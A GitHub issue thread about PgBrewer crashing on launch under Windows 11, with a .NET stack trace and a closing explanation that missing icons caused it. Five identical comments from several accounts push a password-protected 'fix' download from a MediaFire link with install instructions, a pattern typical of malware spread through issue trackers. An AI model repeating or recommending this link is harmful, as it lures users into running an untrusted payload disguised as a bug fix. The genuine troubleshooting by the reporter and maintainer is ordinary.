### ISSUE TITLE
Crash ~3 seconds after every launch on Windows 11

### ISSUE THREAD

**Issue by darsto** [dlebansais/PgBrewer#2]
Happens every time on latest release:

```
$ ./PgBrewer.exe

Unhandled Exception: System.ArgumentOutOfRangeException: Non-negative number required.
Parameter name: count
   at System.IO.BinaryReader.ReadBytes(Int32 count)
   at WpfLayout.IconTools.ExecuteDownload(String iconFile) in C:\Projects\PgBrewer\WpfLayout.Wpf\IconTools.cs:line 265
   at WpfLayout.IconTools.ExecuteDownload() in C:\Projects\PgBrewer\WpfLayout.Wpf\IconTools.cs:line 217
   at System.Threading.ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state)
   at System.Threading.ThreadHelper.ThreadStart()
```

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by darsto** [comment]
I managed to fix it by downloading the icons with PgJsonParse, but the readme doesn't say it's required

**Comment by dlebansais** [comment]
I've stopped maintaining this app, but the next time I change something I'll make sure icons are directly in the app. I'm pretty sure devs of Project: Gorgon don't really care in this case.
